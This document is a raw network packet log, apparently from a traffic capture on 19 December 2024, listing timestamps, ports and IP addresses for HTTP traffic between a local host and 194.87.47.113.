Dec 19, 2024 08:47:32.914104939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.914638042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.914827108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.914900064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.915414095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.915627956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.915730000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.916223049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.916404963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.916462898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.917047977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.917213917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.917296886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.917807102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.918009996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.918064117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.918597937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.918791056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.918870926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.919430971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.919557095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.919641018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.920213938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.920372009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.920483112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.921068907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.921202898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.921256065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.921782970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.921933889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.921996117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.922720909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.922895908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.922972918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.923366070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.923556089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.923609972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.924115896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.924360991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.924411058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.925625086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.925642967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.925728083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.926311016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.926661968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.926722050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.927089930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.927105904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.927158117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.927762985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.928031921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.928088903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.075948954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.076086998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.076150894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.076215029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.076566935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.076658010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.077020884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.077249050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.077313900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.077754021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.077923059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.077994108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.078877926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.079067945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.079123974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.079375029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.079550028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.079680920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.079898119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.080250978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.080337048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.080585957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.081006050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.081074953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.081775904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.081940889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.082062006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.082304001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.082640886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.082690954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.082979918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.083348036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.083606005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.083744049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.084043980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.084126949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.084548950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.084778070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.084830046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.085330009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.085520983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.085638046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.086112022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.086307049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.086358070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.089664936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.089885950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.089893103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.089951992 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.090543032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.090606928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.090951920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.090959072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.091010094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.091739893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.091926098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.092041969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.092325926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.092716932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.092725992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.092756033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.093333006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.093386889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.093619108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.093981981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.093991995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.094059944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.094695091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.094803095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.095024109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.095360041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.095508099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.095664978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.096340895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.096400976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.096448898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.096800089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.096853971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.097203970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.097522974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.097580910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.097935915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.098270893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.098440886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.098552942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.099251986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.099292040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.099726915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.100466967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.100564957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.100598097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.100964069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.101025105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.101115942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.101655960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.101720095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.101819038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.102205992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.102267981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.102431059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.103013992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.103079081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.103214025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.103818893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.103986979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.104084969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.104588985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.104664087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.104813099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.105397940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.105470896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.105582952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.106257915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.106304884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.106431007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.106966972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.107125044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.107171059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.107796907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.107865095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.107954979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.108531952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.108613014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.108695984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.109349966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.109441042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.109520912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.110127926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.110197067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.110299110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.110925913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.111115932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.111136913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.111705065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.111825943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.111978054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.112529039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.112673998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.112692118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.113353968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.113415003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.113466024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.114173889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.114248991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.114317894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.114900112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.115004063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.115067959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.115667105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.115715981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.115854025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.116496086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.116555929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.116622925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.117288113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.117341995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.117506981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.118066072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.118141890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.118225098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.118832111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.118900061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.119014025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.119674921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.119786024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.268273115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.268532991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.268615961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.268790007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.269229889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.269301891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.269511938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.269850969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.269982100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.270225048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.271142006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.271245003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.271347046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.271612883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.271954060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.272012949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.272167921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.272252083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.272521973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.272898912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.272960901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.273236036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.273952007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.274159908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.274234056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.274533987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.274857998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.274976015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.275232077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.275299072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.275587082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.275968075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.276020050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.276247025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.276737928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.276803970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.276966095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.277589083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.277740955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.277806997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.278316021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.278759956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.278898001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.281130075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.281208038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.281296968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.281711102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.281810999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.282012939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.282346010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.282429934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.282780886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.283092976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.283166885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.283375978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.283874035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.283961058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.284126997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.284710884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.284872055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.284965038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.285475969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.285667896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.285782099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.286303997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.286369085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.286461115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.287046909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.287158012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.287246943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.287823915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.287892103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.288003922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.288675070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.288894892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.288959026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.289403915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.289657116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.289897919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.290224075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.290307045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.290378094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.291002989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.291079998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.291187048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.291776896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.291974068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.291977882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.292571068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.292761087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.292866945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.293385029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.293574095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.293672085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.294233084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.294310093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.294384003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.294948101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.295155048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.295173883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.295763016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.295864105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.295907974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.296578884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.296751976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.296900034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.297391891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.297522068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.297619104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.298134089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.298201084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.298280954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.299010992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.299112082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.299139023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.299698114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.299798012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.299889088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.300502062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.300682068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.300745010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.301297903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.301493883 CET	80	49707	194.87.47.113	192.168.2.7
